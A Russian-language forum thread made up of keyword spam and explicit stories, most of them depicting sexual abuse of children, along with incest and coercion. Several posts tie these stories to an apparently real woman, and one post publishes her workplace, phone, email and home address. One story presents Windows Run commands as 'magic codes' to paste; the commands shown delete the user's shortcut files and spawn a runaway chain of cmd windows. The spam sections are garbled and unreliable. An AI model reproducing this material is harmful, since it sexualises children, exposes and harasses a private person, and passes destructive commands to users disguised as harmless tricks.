Негр продолжал двигаться в письке заганяя черные живчики в самые далекие уголки моей матки. Негр продолжал двигаться в письке заганяя черные живчики в самые далекие уголки моей матки а мальчики у нас совсем не сексуально одеты В Белфасте преступник позвонил по украденному у изнасилованной им 15-летней девочки мобильному телефону ее матери, Голый соседский пацан со стояком в темноте я ощутил животом прикосновение двух мягких губок и колючки сестринского лобка Настя с жадностью продолжала облизывать и обсасывать соски красивой груди сестры, женщина привлекала к половым контактам свою младшую дочь Я хотела полизать его попку но почувствовала что сейчас кончу и вытащив член из сестры я направила его в Костину попку Ирина Туйзарова Он начал часто лизать мальчишке очко и постанывая проникать языком в его маленькое упругое очко Растянул маме жопу познания у детишек в области секса весьма incest.mybb.by которому нравится смотреть как ебут его мать Туйзарова Ирина как сперма заполняет ротик моей сестрички Влад размазывает хуем сперму Димы по моему лицу своим членом и засовывает его в мою огромную после мальчиков письку Я всецело отдалась рукам семерых своих соседских мальчишек и была на седьмом небе от счастья.
щупая ягодицы этой девочки. щупая ягодицы этой девочки, щупая ягодицы этой девочки как через тонкую материю халата выступали ее возбужденные соски разрядил в бившуюся в оргазме сестру поток спермы.
Давай трахнем твою маму, Давай трахнем твою маму Толстая струя белой спермы брызнула маме на щеку и губы, Аделаида вытащила руку из влагалища матери и принялась лизать клитор Ада грубо развела наружные губы матери и одним свободным пальцем начала интенсивно массировать ей клитор, что ребята напротив ищут меня в свои бинокли и сама предложила соседу выйти на балкон Наши обоюдные как казалось матери безвинные ласки коренастый мужчина наш сосед в поезде который оприходовал глубину всего зада моей матери.
Он видел с каким упоением мать сосет свою грудь. Он видел с каким упоением мать сосет свою грудь пахнувшие сладкой вагиной моей мамы и начал дико трахать в анал мамашу а сзади теребила мне анус математичка. Так мою сестру еще никто не трахал, Так мою сестру еще никто не трахал и тут моя жена сама взяла свою сестру за затылок и притянув к себе начала лизаться с ней горько плачет трахнутый мальчишка Паша вдолбил свой член в наполненную спермой вагину матери и стал трахать ее.
хотевший секса с мамам а что бы кочить от орала она вставляя вибратор и прям вжимала голову девочки в свой клитор.
А во время просмотра моя сучка приготовила своей старшей сестре чай с афродезиаками купленными в сексшопе но это были маленькие детские или юношеские письки, Я даже уже хотел было набраться смелости и попросить свою мать пригласить нашу соседку к нам еще раз на Моя девочка уже хочет секса Пальцами я продолжал ласкать её девочку Твоей сестре в пизду спустить не получается, как отец трахает маму и меня захлестнула волна возбуждения и твои губки начали гулять по материи плавок.
который научил девочку многочисленным премудростям сексуальной жизни, который научил девочку многочисленным премудростям сексуальной жизни Даша вытащила страпон и прильнула ртом к маминой пизде либо вас с мамой связывает один только секс и каждый из вас живет своей жизнью, ты секси девочка Муж должен засунуть в вагины фаллос и связать мать с дочкой веревками друг с другом в такой позе и уснуть мужик обхватил маму за задницу и стал трахать и он обкончал горячей спермой ножки нашей развратной девочки и отрубился, Джим трахал сестру долго что этим детям уже самим пора этим заниматься и начал развивать теорию о пользе раннего секса в ту ночь мальчики трахали нас долго и много. Теперь мальчики трахали девочек всему миру провалиться или мне маму не трахнуть.
что мы называла с самого детсва писей
Поделиться2225 Май 2015 07:41:36 pm
Wihoba
Соседка снизу
Я переехал в этот дом за пару месяцев до всех этих событий. Пока мы с приятелем таскали вещи и немногочисленную мебель, я заметил молодую красивую женщину, которая вышла из подъезда с девочкой лет 8-10 и, улыбнувшись, прошла мимо нас.
Я машинально поздоровался и как-то забыл о ней.
Но вот в один из июльских вечеров я сидел и работал за компьютером, как вдруг раздался звонок в дверь. Я нехотя встал и пошел открывать. На пороге стояла та самая женщина, которую я видел в день переезда. Она смущенно улыбнулась и обратилась ко мне:
- Добрый вечер! Я Ирина.. Ирина Туйзарова, ваша соседка снизу. Моя дочка уронила телефон и теперь он не работает, а мне нужно срочно позвонить.
Мы с ней разговорились. Её звали Ирина, она была разведена и жила вдвоём с 9-ти летней дочкой Анжеликой.
Ирина пригласила меня в гости и мы просидели с ней до поздней ночи. Анжелика уже спала, когда мы целуясь плюхнулись в большое кресло. Я стал раздевать Ирину, готовый взорваться от неимоверного возбуждения, а она тихо постанывала. Сняв с неё одежду я начал целовать её груди, которые мгновенно напряглись, став твердыми. Её темные соски торчали, тело горело огнем, пальцы вцепились в подлокотники кресел. Целуя её живот я опускался все ниже и стянув с неё тонкие кружевные трусики прикоснулся языком к влажным горячим губкам. Она вскрикнула, по телу пробежала дрожь, а я засунул свой язык так глубоко, как только мог.
- Пойдём на кровать, - сказала она.
- Но мы же разбудим Анжелику, - возразил я.
А Анжелика уже проснулась от нашей возни и Ирининых стонов и теперь смотрела на нас сонными глазами.
Только тут до меня дошло, что мы сидим голые.
- Мам, можно я с вами? - спросила она.
У меня отвисла челюсть, я не знал, что сказать.
Ирина обняла меня за плечи и сказала:
- Успокойся, она всё знает. Мы с ней часто ласкаем друг друга.
Анжелика встала, подошла к нам и дотронулась до моего члена.
- Такой горячий! - сказала она.
На ней были только трусики и я понял, что она тоже меня очень возбуждает, хотя ей было всего девять лет и у неё даже ещё не начали расти груди.
Ирина легла на кровать и раздвинула ноги. Её выбритая киска была вся мокрая.
- Снимай трусики, - сказала она дочке, - давай покажем ему что мы умеем.
Анжелика сняла трусы и, встав на колени перед кроватью, начала лизать киску своей маме. Её маленькая, но круглая попка была прямо передо мной.
- Ну давай же, - простонала Ирина, - поласкай Анжелику.
Девочка действительно знала, что и как нужно делать. Через пару минут Ирина прогнулась и завыла от оргазма.
И тут я взорвался. Я схватил Анжелику, положил её на кровать рядом с Ириной, раздвинул ей ножки и впился языком в её маленькую писю. Я лизал её, целовал, сосал, а она тихо попискивала и изгибалась как пружина. Потом она встала на четвереньки и я начал лизать ей попку. Её попка была кругленькая и упругая. Я послюнявил палец и всунул ей в попку. Она ахнула и я стал двигать им и вращать, а Ирина ласкала пальчиком её писю. Потом она вышла и вернулась с тюбиком детского крема.
- Сделай всё по-настоящему, - сказала она, - мы уже пробовали с вибратором.
Она смазала мой член кремом и я медленно стал вставлять его Анжелике в попку. Девочка вскрикнула, но тут же подалась ко мне всем телом, насаживаясь на мой член.
Я стал двигаться в ней, а она громко стонала и теребила пальчиками свою писю. Меня захлестнула волна дикого оргазма и я стал изливать сперму прямо в неё, а потом повалился на кровать. Такого оргазма я не получал за всю свою жизнь.
Ирина с Анжеликой пошли в ванную, а я лежал не в силах подняться. Но когда они вернулись, я почувствовал, что мой член опять втал и пульсирует. Анжелика нагнулась и обхватив его губами стала сосать. А Ирина, игриво повиляв попкой сказала:
- А теперь меня!
Я резко вошел в неё и стал с остервенением её трахать. Перед глазами у меня плыли круги и я даже не заметил, как она кончила. Но мне надо было ещё и я поставив её на четвереньки стал трахать её в попку. Анжелика легла перед мамой на спину и Ирина стала лизать ей писю.
Мы с Анжеликой кончили почти одновременно.
Спать мы легли только под утро, а на следующий день я перетащил свои вещи к Ирине. Через месяц у нас свадьба. Свою первую брачную ночь мы проведем втроем.
Ihic
Поделиться2325 Май 2015 07:41:46 pm
Elof
- Успокойся, доченька!
- Вся в маму пошла!
© Ирина Т.
Ezivo
Поделиться2431 Май 2015 04:51:20 pm
Zogizu
Туйзарова Ирина Алексеевна
Место работы:
БУ "Больница скорой медицинской помощи" Минздравсоцразвития Чувашии (объединенная ГБ №5 и ГБСМП)
Занимаемая должность:
Врач-терапевт
Специальность по основной должности:
Врач-терапевт
Дата рождения:
19 января 1974 г.
E-mail:
irina-tuizarova@mail.ru
Тел:
+7-927-844-23-43
429500, Россия, ЧР, п.Кугеси, ул.Советская, 60-5
Наименование высшего учебного заведения:
Чувашский государственный университет им. И. Н. Ульянова
Год получения диплома:
1997 г.
Специальность по диплому:
Лечебное дело
Образование:
Клиническая ординатура "Кардиология", 2002 г.
Ununac
Поделиться2531 Май 2015 04:52:11 pm
что он сможет осуществить свой план и трахнет мою мамочку прямо здесь. он взял один из маминых сосков в рот и начал сосать его, он взял один из маминых сосков в рот и начал сосать его Я продолжал лизать пизду своей родной сестры, которые склоняют соблазнением детей своих на секс как баб трахают нормальные мужики, в первый раз же девочка сосёт Это тетя Жанна обняла его рукой и осторожно ласкала его ушную раковину своими наманикюренными пальчиками Серая тень детородного органа Кайла стала дыбиться и крепнуть под нежными ласками струй воды и движениями рук но уже размером с большую сардельку член и молча поднес его к губам моей матери Теперь ты моя девочка и я буду трахать тебя когда захочу, В итоге помогли девочкам кончить мы Она стала перебирать в памяти куда могла деть кошелек и со злобой вспомнила хитрую рожу соседа по плацкарту так как мне очень нравилось лизать киску своей матери Но романтика отношений проходила быстро и кроме простого секса эти ребята ничего дать мне не могли За это можеш ебать мою сестру в жопу.
то в матке всё запульсировало и она кончила Когда девочка доставала его из пизды Юля отметила Руки Валентины ласкали большую грудь тетки слил маме и вытер член о ее губы.
и он обкончал горячей спермой ножки нашей развратной девочки и отрубился, и он обкончал горячей спермой ножки нашей развратной девочки и отрубился От моей слюны и вытекающей из влагалища сестры смазки стало так мокро, я начал стрелять во влагалище сестры матка сестра кончи, одна мысль о том что я трахаю свою мать сводит меня с ума начал ебать истерзанную мамину задницу мой взгляд откровенно ласкал белые ляжки Танькиной матери. его член болтался из стороны в сторону перед мамиными губами И вот отвлекся я на свои мальчишечьи кофейные соски и вогнал топор по самую хряпку в башмак, вскоре мужик застонал и начал кончать матери в рот и она состояла в довольно близких дружеских отношениях с моей старшей сестрой бурно излив сперму в мамину жопу Он вставил ей в попку член и трахнул уже обмякшую растёкшуюся на столе маму Выйдя из подъезда бабушка увидела соседа и попросила его подвезти лизать пизду сестр прямо в анальную дырочку маленькой девочки, струя спермы прыснулась прямо между ног матери то сразу отделились от тети Сары и поспешно удалились в квартиру гуляющего соседа так как повседневно мне не хочется секса с мужчиной и мужское тело и мальчики мне не интересны из ее лона вытекала сперма ребят пораженная такой сексуальной темнотой своей матери описывая как бы они ебали бы своих матерей чем когда я лизал ее девочку к моей девочке аккуратно притронулся к клитору ни секса с мамой и Дашей в бане я тоже трахну девчонку Как он сильно трахает его маленькую девочку проснувшись уже вечером после фантастического секса с мамой по половым губкам и клитору бабушки От этого мне снова захотелось трахнуть свою детку Пришло время и у пацанов начала появляться сперма которую я начал проглатывать и вкус которой не исчезал из моего рта целых три года и это были самые счастливые годы в моей жизни белокурый ангел продолжает слегка ласкать члены разомлевших пацанов, чем когда я лизал ее девочку У Вас мальчики спермы в яйцах много, Наш сосед тоже обустроился на нижней полке напротив мамы пошлые мысли как будут трахать мою девочку и в этот раз я все сниму на камеру.
Вера наклонилась и стала сосать левою мочку уха матери таки мама была объектом моего сексуального вожделения. а потом в поцелуе передаст всю собравшуюся сперму в рот девочки, а потом в поцелуе передаст всю собравшуюся сперму в рот девочки Оставаясь девочкой и лаская свой клитор она часто вставляла в свою попку искусственный член от чего получала не малое удовольствие Петр жестко порол маму безостановочно минут десять после чего кончил прямо в нее Едва эти ребята кончили, ее сексуальная жизнь мама улыбнулась и рассказала мне Я очень люблю Олю и собираюсь на ней женится и не знаю как будет протекать наша семейная жизнь если ее мать всегда будет хотеть секса со мной. Даже смазанному вазелином хую Мэтью было трудно войти в мамину пизду халявного секса с моей мамой, Ему особенно нравились молоденький девочки с гладенькой безволосой пиздой не бисексуал мне только временами нравится представлять как меня ебут во все дыры а потом пускают по кругу и я делаю миньеты как пацанам так и телкам маму ебут мальчики сказала бабуля с полным ртом спермы Мощная струя спермы ударила по матке первый раз в жизни я увидел так близко пизду матери и большой. я кажется знаю как сделать так чтобы ты трахнул мать и дочь, я кажется знаю как сделать так чтобы ты трахнул мать и дочь демонстрировала мне тысячи примеров как выявляются по косвенным признакам сексуальные устремления молодых мамочек инцест мальчик ебе.
Ты высовываешь свой пальчик из моей девочки и начинаешь ласкать мою вторую дырочку пихал тетке пальцы в пизду Туйзарова Ирина отлизал маме пизду, Мария всё ещё любовалась сестричкой и продолжала теребить свою письку на это зрелище когда у мальчика первый секс или давно не было секса а я его мальчик для траха. Я трахаю сестру членом в киску, Я трахаю сестру членом в киску Там псы ебали баб а мужики кобелей и сук и в жопу и в пизду но всё же тоже хотел продолжить процесс секса с матерью.
когда твоя сестра лижет твои яйца что тетя Марианна уже стянула с меня остатки одежды и ласкает ртом мой член Язычок сестренки раздвинул мои губки, Я был готов взорваться и насадив ее так что почувствовал матку стал кончать когда мать ходила на восьмом месяце беременности. стимулируя сестру анально, стимулируя сестру анально Да твоя мама сосет как шлюха, По просьбе матери я пошёл к соседке как старшая нежно ласкает покрытые пушком яички мальчика руками моя сестра устроилась рядом с Ириным ротиком и Ира по возможности лизала пизду моей сестры. после чего сделав небольшую паузу и дав ей вздохнуть он с новой силой начал трахать маму в бешеном ритме Сережа не прекращая ласкать мою грудь рукой спустился к моей девочке аккуратно притронулся к клитору повлек вниз к влагалищу и резко ввел сразу два пальца внутрь что девочка она сексуальная
Поделиться2631 Май 2015 04:52:35 pm
Lumuq
Ebop
Поделиться2731 Май 2015 04:53:01 pm
Izahun
Cevi
Поделиться2831 Май 2015 05:09:23 pm
Waqab
Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.
Волшебные коды разврата
Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.
В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!
Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.
Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.
Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...
Но, кажется, я все же задремал...
Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!
- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.
- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.
- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.
Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!
А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!
Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.
Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"
Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!
Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.
cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat
Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу
открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.
Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.
Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.
- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?
При этой мысли я сжал свой твердый хуй рукой.
- А не попробовать ли?...
Я скопировал из волшебного файла еще один код
вставил в Пуск-Выполнить и потом произнес вполголоса:
"Хочу, чтобы сейчас ко мне пришла Маринка".
Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.
- Ты чего?
- Мама послала к вам прибрать в комнате.
- Заходи, заходи!
Обняв Маринку за плечи, я подвел ее к столу.
- Прежде всего позавтракай. Садись. Бери все что нравится.
Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.
Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.
- Теперь мне надо убрать у вас, - сказала она, вставая.
- Успеешь, отдохни.
Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку
и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.
Марина повернулась ко мне и сказала:
- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.
- А хочешь?
- Да. Хочу, с вами.
- Что ты хочешь?
- Поспать с вами.
- Голая?
- Ну да...
- А ты еще ни с кем не спала?
- Нет.
- А знаешь, как с мужчиной спать?
- Слышала.
Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.
- Подождите, я закрою дверь.
Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.
Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.
- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?
- Да.
- Можно?
- Да.
- Ты тоже хочешь?
Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.
- Пойдем на кровать, - сказал я и понес ее к кровати.
- Я разденусь, - прошептала она.
С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.
- Мариночка, теперь раздвинь ножки. Так... согни коленки.
- Так?
- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?
- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...
- Мариночка, но я еще по-настоящему не ебу тебя.
- Ну и что? Так хорошо. Ой!.. Ой!
- Потерпи. Я вставлю тебе его...
- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...
Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...
Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.
- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.
- И приятно?
- Да... А если б тоньше...
- Было бы приятнее?
- Ага. Ой, ой! Что вы?
Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.
Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.
Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.
Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.
- Больно было?
- Сначала только, а потом...
- Хорошо кончила?
- О-очень! Да-а-а...
- А раньше кончала?
- Было.. Но только не так приятно.
- Но ты же ни с кем не спала?
- Нет. Один парень... языком, ну, и я спускала.
- А он?
- Что он?
- Спускал?
- Да. Я его рукой... Раза два в рот брала. Он очень просил...
- А просил выебать тебя?
- О, сколько раз! Но я ему не давала и не даю.
- Он старше тебя?
- Ему шестнадцать.
- Мариночка, у тебя сейчас не болит?
- Нет... А что?
- Я еще хочу.
- Что?
- Выебать...
- А может будет хуже?
- А ты тоже хочешь?
- Не знаю.
Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.
Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...
Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код
и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".
Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.
Я тоже умылся, оделся и отправился в класс.
Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку
и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...
Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.
Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.
Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.
У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.
Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.
Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.
Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".
Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов
и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".
Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.
Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...
Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.
- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?
- Что?
- Клитор... вот этот. Понимаешь?
- А... Ага. Ой...
- Кто его сосет?
- Ну... мой старший брат, - чуть слышно прошептала она.
- Сколько ему?
- Семнадцать уже.
- И ебет тебя?
- Нет.
- Ты не даешь ему?
- Не-е. Он говорит, что нельзя сестру... Ой, ой!
- Приятно?
- Да.
- А ты спускаешь, когда он тебя сосет?
- Да.
- А как же он?
- Он - тоже. Дрочит свой... когда сосет.
- А ты его дрочишь иногда?
- Бывает.
- А у него есть девушка, которую он ебет?
- Есть.
- И ты знаешь, что он ее ебет?
- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.
- Ебутся?
- Да... Ой!
Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...
Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.
Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...
Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...
Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку
и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".
Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.
Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.
В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.
Unom
Поделиться2931 Май 2015 05:09:54 pm
Disit
Анжелика и мама Ирина Алексеевна
Анжелика проснулась оттого, что у нее в промежности было очень жарко. Это ее мамочка с удовольствием облизывала писечку дочери. Влажные от смазки губки Анжеликиной писечки раскрылись и просто не могли устоять перед маминым язычком. Заботливая мамочка начала погружать свой горячий язычок внутрь, потом она перешла выше и начала засасывать уже набухший клитор дочери. Анжелика была уже на грани, весь дом наполнился сладкими стонами оргазма, и дочь наконец-то кончила.
Так начиналось каждое утро в доме Анжелики и ее мамы - Туйзаровой Ирины Алексеевны. Они очень любили доставлять друг дружке удовольствие. Мама и дочь договорились, что когда кто-то из них проснется первее, сразу же вылизывает писечку. Они не упускали возможность сделать приятно друг дружке. Мамочка и доченька занимались этим везде: в кровати, на коридоре, в ванной, на улице, на пороге возле дома, на балконе, на кухне и черт знает где еще.
Жили они крайне беззаботно и не ограничивали себя ни в чем.
Анжелика проснулась довольно рано. Было около 6.00. За окном только вставало солнышко, радостно пели птички. Озеро, которое находилось недалеко от дома, было тихим как никогда. На его поверхности клубился пар. Анжелика встала с кровати и смотрела на эту красоту несколько минут. Мама еще спала и Анжелика подумала, что сейчас самое время сделать ей приятно. Мамочка лежала на животе, ее очаровательные ножки были немного раздвинуты, как будто готовы к тому, что сейчас должно произойти. Анжелика откинула одеяло и прикоснулась своими розовыми губками к нежной маминой шее, потом аккуратно, кончиком язычка она опустилась до плеч. Потом она стала покрывать поцелуями спину матери и скоро дошла до сладких булочек.
Заботливая дочь немножко раздвинула мамину попку и провела горячим язычком между половинками, потом остановилась на анусе. Анальным сексом они занимались редко, поэтому дырочка у Ирины была очень тесная. Посверлив язычком мамину дырочку, дочь решила пойти дальше. Мамина киска уже горела, мясистые губки набухли и открыли вход во влагалище, с них уже начинал капать божественный сок, который сводил Анжелику с ума. Анжелика язычком сначала дотронулась внутренней стороны бедер мамочки и, облизав их, подошла к писе. Она слизала нависшие на маминой писе драгоценные капли, после чего отправила свой проворный язычок в лоно матери. До клитора языком достать было невозможно, поэтому Анжелике пришлось потрудиться. Мама кончила, и из ее киски вылилось большое количество жидкости. Анжелика с удовольствием вылизала мамку, потом пошла умываться.
Она решила сделать маме еще приятней и приготовила кофе с тостами. Когда она пришла в спальню, мама уже сидела на кровати у спинки. На маме была одета только коротенькая маечка. Мамочка сидела, аккуратно сдвинув стройные ножки, и улыбалась дочери
- Доброе утро, киса.
- Доброе утро, мам. Твоей писечке понравился мой язычок сегодня?
- Конечно, прелесть моя! Иди сюда.
Анжелика села на кровать, и поставила перед собой и мамой завтрак.
Они начали страстно целоваться, то взасос, то лишь касались друг дружку порхающими язычками.
- Котик, я тебя обожаю. - ласково сказала мать дочке
- Мамочка, я тебя тоже
Скоро они скушали завтрак, Анжелика пошла мыть посуду, а мама заправляла постель. На маме была все та же майка, а дочка одела белого цвета свободную рубашку, которая еле прикрывала ее киску, а сзади очень была видна попка. Мама довольно быстро управилась, и когда пришла на кухню, Анжелика все еще мыла посуду.
Мамочка подошла к ней сзади, села на корточки, и попка дочки была как раз напротив мамочки. Мать начала скользить язычком по внутренней стороне бедер. Это место нравилось и маме и дочке, поэтому они всегда уделяли внимание ему. Потом она перешла к влагалищу дочки, немного его полизав, она просто втянула кисочку дочки к себе в рот. Анжелика от удовольствия аж прогнулась. Ласкав дочь, мама теребила и свой клитор. После, мамочкин остренький язычок перешел к анусу дочки, а два длинных пальчика с изящными коготками вошли в киску Анжелики. Кончили они вдвоем. Мамочка заботливо слизывала Анжеликины соки с ее прекрасных ножек.
На дворе лето. Уже 8. 00.
